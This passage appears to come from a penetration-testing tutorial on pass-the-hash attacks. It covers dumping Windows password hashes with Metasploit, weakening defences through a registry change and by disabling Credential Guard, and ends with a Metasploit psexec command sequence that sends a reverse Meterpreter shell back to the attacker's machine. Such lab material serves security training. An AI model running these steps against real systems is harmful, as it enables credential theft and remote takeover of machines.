Sometimes a password will be too long or complex to crack. In that case, you could instead try to pass the hash. In this type of attack, when you log on to the target operating system or application, you provide the user name and the hash of the password, rather than the password itself. You obtain the hash by inducing the operating system or application to dump them from RAM, the Windows Registry, or a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:

Dumping hashes

Note: To obtain a complete list of hashdump-related Metasploit tools, conduct a search at the Metasploit console, such as search hash platform:windows.

Once you have the hashes, there are several tools you can use to test usability, pass, or crack them, including:

  • Metasploit modules exploit/windows/smb/psexec and auxiliary/scanner/smb/smb_login
  • Hydra
  • Medusa
  • Veil-Catapult
Pass the hash attack

Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this. You wouldn't even be able to pass the Administrator hash. You would need to turn off Windows Defender first. Separately, if Windows Defender is not running on the target, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.

Note: For information about disabling Windows Defender Credential Guard, see

Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see


Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext.  This is a "feature" of older versions of Windows.

See Also:
msf6> use exploit/windows/smb/psexec
msf6> set RHOST    # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST    # Security-Desk
msf6> set LPORT 4445            # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions